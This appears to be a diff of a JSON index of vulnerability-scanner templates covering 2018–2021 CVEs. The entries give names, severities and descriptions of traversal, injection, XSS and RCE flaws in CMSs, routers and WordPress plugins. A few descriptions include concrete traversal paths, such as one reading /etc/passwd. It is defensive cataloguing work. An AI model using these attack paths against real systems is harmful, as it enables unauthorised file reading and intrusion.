{"ID":"CVE-2018-16836","Info":{"Name":"Rubedo CMS \u003c=3.4.0 - Directory Traversal","Severity":"critical","Description":"Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-16836.yaml"}
{"ID":"CVE-2018-16979","Info":{"Name":"Monstra CMS V3.0.4 - HTTP Header Injection","Severity":"medium","Description":"Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-16979.yaml"}
{"ID":"CVE-2018-17246","Info":{"Name":"Kibana - Local File Inclusion","Severity":"critical","Description":"Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-17246.yaml"}
{"ID":"CVE-2018-17254","Info":{"Name":"Joomla! JCK Editor SQL Injection","Severity":"critical","Description":"The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-17254.yaml"}
{"ID":"CVE-2018-17422","Info":{"Name":"DotCMS \u003c 5.0.2 - Open Redirect","Severity":"medium","Description":"dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-17422.yaml"}
@ -495,7 +501,7 @@
{"ID":"CVE-2018-19137","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-19137.yaml"}
{"ID":"CVE-2018-19287","Info":{"Name":"WordPress Ninja Forms \u003c3.3.18 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-19287.yaml"}
{"ID":"CVE-2018-19326","Info":{"Name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","Severity":"high","Description":"Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing \"dot dot\" sequences (/../), conduct directory traversal attacks, and view arbitrary files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-19326.yaml"}
{"ID":"CVE-2018-19365","Info":{"Name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","Severity":"high","Description":"Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-19365.yaml"}
{"ID":"CVE-2018-19365","Info":{"Name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","Severity":"critical","Description":"Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2018/CVE-2018-19365.yaml"}
{"ID":"CVE-2018-19386","Info":{"Name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","Severity":"medium","Description":"SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-19386.yaml"}
{"ID":"CVE-2018-19439","Info":{"Name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","Severity":"medium","Description":"Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-19439.yaml"}
{"ID":"CVE-2018-19458","Info":{"Name":"PHP Proxy 3.0.3 - Local File Inclusion","Severity":"high","Description":"PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-19458.yaml"}
@ -579,7 +585,7 @@
{"ID":"CVE-2019-12581","Info":{"Name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","Severity":"medium","Description":"Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-12581.yaml"}
{"ID":"CVE-2019-12583","Info":{"Name":"Zyxel ZyWall UAG/USG - Account Creation Access","Severity":"critical","Description":"Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the \"Free Time\" component. This can lead to unauthorized network access or DoS attacks.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2019/CVE-2019-12583.yaml"}
{"ID":"CVE-2019-12593","Info":{"Name":"IceWarp Mail Server \u003c=10.4.4 - Local File Inclusion","Severity":"high","Description":"IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-12593.yaml"}
{"ID":"CVE-2019-12616","Info":{"Name":"phpMyAdmin \u003c 4.9.0 - CSRF","Severity":"medium","Description":"A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken \u003cimg\u003e tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2019/CVE-2019-12616.yaml"}
{"ID":"CVE-2019-12616","Info":{"Name":"phpMyAdmin \u003c4.9.0 - Cross-Site Request Forgery","Severity":"medium","Description":"phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken \u003cimg\u003e tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2019/CVE-2019-12616.yaml"}
{"ID":"CVE-2019-12725","Info":{"Name":"Zeroshell 3.9.0 - Remote Command Execution","Severity":"critical","Description":"Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-12725.yaml"}
{"ID":"CVE-2019-12962","Info":{"Name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","Severity":"medium","Description":"LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-12962.yaml"}
{"ID":"CVE-2019-13101","Info":{"Name":"D-Link DIR-600M - Authentication Bypass","Severity":"critical","Description":"D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-13101.yaml"}
@ -592,11 +598,11 @@
{"ID":"CVE-2019-14312","Info":{"Name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","Severity":"medium","Description":"Aptana Jaxer 1.0.3.4547 is vulnerable to local file inclusion in the wikilite source code viewer. An attacker can read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2019/CVE-2019-14312.yaml"}
{"ID":"CVE-2019-14322","Info":{"Name":"Pallets Werkzeug \u003c0.15.5 - Local File Inclusion","Severity":"high","Description":"Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-14322.yaml"}
{"ID":"CVE-2019-14470","Info":{"Name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","Severity":"medium","Description":"WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-14470.yaml"}
{"ID":"CVE-2019-14530","Info":{"Name":"OpenEMR \u003c 5.0.2 - Path Traversal","Severity":"high","Description":"An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2019/CVE-2019-14530.yaml"}
{"ID":"CVE-2019-14530","Info":{"Name":"OpenEMR \u003c5.0.2 - Local File Inclusion","Severity":"high","Description":"OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2019/CVE-2019-14530.yaml"}
{"ID":"CVE-2019-14696","Info":{"Name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","Severity":"medium","Description":"Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-14696.yaml"}
{"ID":"CVE-2019-14974","Info":{"Name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","Severity":"medium","Description":"SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-14974.yaml"}
{"ID":"CVE-2019-15107","Info":{"Name":"Webmin \u003c= 1.920 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Webmin \u003c=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-15107.yaml"}
{"ID":"CVE-2019-15501","Info":{"Name":"L-Soft LISTSERV \u003c16.5-2018a - Cross-Site Scripting","Severity":"medium","Description":"L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-15501.yaml"}
{"ID":"CVE-2019-15501","Info":{"Name":"L-Soft LISTSERV \u003c16.5-2018a - Cross-Site Scripting","Severity":"medium","Description":"L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-15501.yaml"}
{"ID":"CVE-2019-15713","Info":{"Name":"WordPress My Calendar \u003c= 3.1.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin My Calendar \u003c= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-15713.yaml"}
{"ID":"CVE-2019-15811","Info":{"Name":"DomainMOD \u003c=4.13.0 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-15811.yaml"}
{"ID":"CVE-2019-15858","Info":{"Name":"WordPress Woody Ad Snippets \u003c2.2.5 - Cross-Site Scripting/Remote Code Execution","Severity":"high","Description":"WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2019/CVE-2019-15858.yaml"}
@ -790,6 +796,7 @@
{"ID":"CVE-2020-23015","Info":{"Name":"OPNsense \u003c=20.1.5 - Open Redirect","Severity":"medium","Description":"OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-23015.yaml"}
{"ID":"CVE-2020-23517","Info":{"Name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-23517.yaml"}
{"ID":"CVE-2020-23575","Info":{"Name":"Kyocera Printer d-COPIA253MF - Directory Traversal","Severity":"high","Description":"Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-23575.yaml"}
{"ID":"CVE-2020-23697","Info":{"Name":"Monstra CMS V3.0.4 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Monstra CMS 3.0.4 via the 'page' feature in admin/index.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2020/CVE-2020-23697.yaml"}
{"ID":"CVE-2020-23972","Info":{"Name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","Severity":"high","Description":"Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application\nwithout authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type \u0026 name file too double ext.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-23972.yaml"}
{"ID":"CVE-2020-24148","Info":{"Name":"Import XML \u0026 RSS Feeds WordPress Plugin \u003c= 2.0.1 Server-Side Request Forgery","Severity":"critical","Description":"WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2020/CVE-2020-24148.yaml"}
{"ID":"CVE-2020-24186","Info":{"Name":"WordPress wpDiscuz \u003c=7.0.4 - Remote Code Execution","Severity":"critical","Description":"WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2020/CVE-2020-24186.yaml"}
@ -933,9 +940,10 @@
{"ID":"CVE-2021-20150","Info":{"Name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","Severity":"medium","Description":"Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-20150.yaml"}
{"ID":"CVE-2021-20158","Info":{"Name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","Severity":"critical","Description":"Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-20158.yaml"}
{"ID":"CVE-2021-20167","Info":{"Name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","Severity":"high","Description":"Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.","Classification":{"CVSSScore":"8"}},"file_path":"cves/2021/CVE-2021-20167.yaml"}
{"ID":"CVE-2021-20323","Info":{"Name":"Keycloak \u003c 18.0.0 - Cross Site Scripting","Severity":"medium","Description":"Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-20323.yaml"}
{"ID":"CVE-2021-20323","Info":{"Name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-20323.yaml"}
{"ID":"CVE-2021-20792","Info":{"Name":"WordPress Quiz and Survey Master \u003c7.1.14 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-20792.yaml"}
{"ID":"CVE-2021-20837","Info":{"Name":"MovableType - Remote Command Injection","Severity":"critical","Description":"MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-20837.yaml"}
{"ID":"CVE-2021-21087","Info":{"Name":"Adobe ColdFusion - Remote Code Execution","Severity":"medium","Description":"Adobe ColdFusion is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2021/CVE-2021-21087.yaml"}
{"ID":"CVE-2021-21234","Info":{"Name":"Spring Boot Actuator Logview Directory Traversal","Severity":"high","Description":"spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package \"eu.hinsch:spring-boot-actuator-logview\".\n","Classification":{"CVSSScore":"7.7"}},"file_path":"cves/2021/CVE-2021-21234.yaml"}
{"ID":"CVE-2021-21287","Info":{"Name":"MinIO Browser API - Server-Side Request Forgery","Severity":"high","Description":"MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.","Classification":{"CVSSScore":"7.7"}},"file_path":"cves/2021/CVE-2021-21287.yaml"}
{"ID":"CVE-2021-21307","Info":{"Name":"Lucee Admin - Remote Code Execution","Severity":"critical","Description":"Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-21307.yaml"}
@ -976,7 +984,7 @@
{"ID":"CVE-2021-24210","Info":{"Name":"WordPress PhastPress \u003c1.111 - Open Redirect","Severity":"medium","Description":"WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24210.yaml"}
{"ID":"CVE-2021-24214","Info":{"Name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24214.yaml"}
{"ID":"CVE-2021-24226","Info":{"Name":"AccessAlly \u003c3.5.7 - Sensitive Information Leakage","Severity":"high","Description":"WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \\\"resource/frontend/product/product-shortcode.php\\\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24226.yaml"}
{"ID":"CVE-2021-24227","Info":{"Name":"Patreon WordPress \u003c 1.7.0 - Unauthenticated Local File Disclosure","Severity":"high","Description":"The Jetpack Scan team identified a Local File Disclosure vulnerability in the Patreon WordPress plugin before 1.7.0 that could be abused by anyone visiting the site. Using this attack vector, an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24227.yaml"}
{"ID":"CVE-2021-24227","Info":{"Name":"Patreon WordPress \u003c1.7.0 - Unauthenticated Local File Inclusion","Severity":"high","Description":"Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24227.yaml"}
{"ID":"CVE-2021-24235","Info":{"Name":"WordPress Goto Tour \u0026 Travel Theme \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Goto Tour \u0026 Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24235.yaml"}
{"ID":"CVE-2021-24236","Info":{"Name":"WordPress Imagements \u003c=1.2.5 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24236.yaml"}
{"ID":"CVE-2021-24237","Info":{"Name":"WordPress Realteo \u003c=1.2.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24237.yaml"}
@ -1012,14 +1020,14 @@
{"ID":"CVE-2021-24746","Info":{"Name":"WordPress Sassy Social Share Plugin \u003c3.3.40 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Sassy Social Share \u003c 3.3.40 contains a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24746.yaml"}
{"ID":"CVE-2021-24750","Info":{"Name":"WordPress Visitor Statistics (Real Time Traffic) \u003c4.8 -SQL Injection","Severity":"high","Description":"WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-24750.yaml"}
{"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey\u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24762.yaml"}
{"ID":"CVE-2021-24827","Info":{"Name":"Asgaros Forum \u003c 1.15.13 - Unauthenticated SQL Injection","Severity":"critical","Description":"The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24827.yaml"}
{"ID":"CVE-2021-24827","Info":{"Name":"WordPress Asgaros Forum \u003c1.15.13 - SQL Injection","Severity":"critical","Description":"WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24827.yaml"}
{"ID":"CVE-2021-24838","Info":{"Name":"WordPress AnyComment \u003c0.3.5 - Open Redirect","Severity":"medium","Description":"WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24838.yaml"}
{"ID":"CVE-2021-24891","Info":{"Name":"WordPress Elementor Website Builder \u003c3.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24891.yaml"}
{"ID":"CVE-2021-24910","Info":{"Name":"WordPress Transposh Translation \u003c1.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24910.yaml"}
{"ID":"CVE-2021-24917","Info":{"Name":"WPS Hide Login \u003c 1.9.1 - Protection Bypass with Referer-Header","Severity":"high","Description":"The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24917.yaml"}
{"ID":"CVE-2021-24926","Info":{"Name":"WordPress Domain Check \u003c1.0.17 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24926.yaml"}
{"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24940.yaml"}
{"ID":"CVE-2021-24946","Info":{"Name":"Modern Events Calendar \u003c 6.1.5 - Blind SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24946.yaml"}
{"ID":"CVE-2021-24946","Info":{"Name":"WordPress Modern Events Calendar \u003c6.1.5 - Blind SQL Injection","Severity":"critical","Description":"WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24946.yaml"}
